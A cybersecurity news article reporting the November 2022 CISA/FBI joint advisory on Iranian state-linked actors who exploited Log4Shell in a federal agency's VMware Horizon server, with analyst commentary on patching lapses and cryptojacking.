CISA and FBI release joint advisory on Iranian threat activity.
November 17, 2022 – Published on The Cyberwire
The US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) released a joint cybersecurity advisory yesterday on Iranian government-sponsored APT actors compromising a federal network.
Exploitation of well-known vulnerability.
CyberScoop reports that threat actors with links to the Iranian government hacked into a US government agency’s network in the beginning of this year. The hackers used the well-known Log4Shell vulnerability to infiltrate a VMware Horizon server in February and move across the network. Bleeping Computer reports that the hackers deployed a cryptocurrency miner, as well as reverse proxies on compromised servers to remain within the network.
Hunting for compromise.
Security Week reports that CISA and the FBI published indicators of compromise (IOCs) to help potentially impacted organizations find infection, with the mindset that there has already been a compromise. The agencies said in the advisory, “All organizations with affected VMware systems that did not immediately apply available patches or workarounds [should] assume compromise and initiate threat hunting activities.” If signs of compromise are found, connected systems should be investigated and privileged accounts should be audited.
Attribution to Nemesis Kitten.
Nic Finn, Threat Intelligence Consultant at GuidePoint Security, offered some context on Nemesis Kitten’s track record:
“Microsoft recently released a threat profile on DEV-0270 (Nemesis Kitten) which described a potential for Nemesis Kitten actors to moonlight for personal profit. Nemesis Kitten has been observed conducting crypto-mining and ransomware attacks for quite some time in order to increase revenue for the Iranian regime. Additionally, these hackers have been observed attempting to impact the US Presidential election, with multiple indictments for attempting to influence the 2020 election by hacking into voter websites, disseminating fake videos alleging voter fraud, and threatening voters.”
Update: Risks of laggard patching.
Nic Finn, of GuidePoint Security, observes that the incident shows a shortfall in vulnerability management practices:
“This clearly shows that organizations, even including federal agencies, are failing to maintain strong vulnerability management processes. There are over 13,000 US-based servers hosting VMWare Horizon, according to Shodan data. It is a trivial process for an actor with Nemesis Kitten’s resources to attempt to exploit this vulnerability against those servers. Even a 1% vulnerability rate still indicates 130 vulnerable servers. Organizations need to establish thorough Attack Surface Monitoring processes and regularly check for vulnerable services across their servers.”
Update: Why cryptojacking?
GuidePoint Security’s Nic Finn offered some observations about the cryptojacking component of Nemesis Kitten’s operation:
“Nemesis Kitten has been using crypto-mining against victims for a long time. This is lucrative because they can expend manpower resources to gain access to victim networks, then collect crypto directly without the need to interact with victims for negotiations, as we see in ransomware engagements. Targeting of federal agencies isn’t particularly surprising, considering the amount of government agencies and the size of their networks. CISA has noted Iran-based cyber actors targeting federal agencies since at least September 2020.What’s noteworthy about CISA’s publication is that these targets are VMWare Horizon servers, meaning there is the potential for significantly more resources to be expended, resulting in higher profits for Nemesis Kitten while potentially being harder to observe and impacting less hosts across a victim network.”
Read More HERE.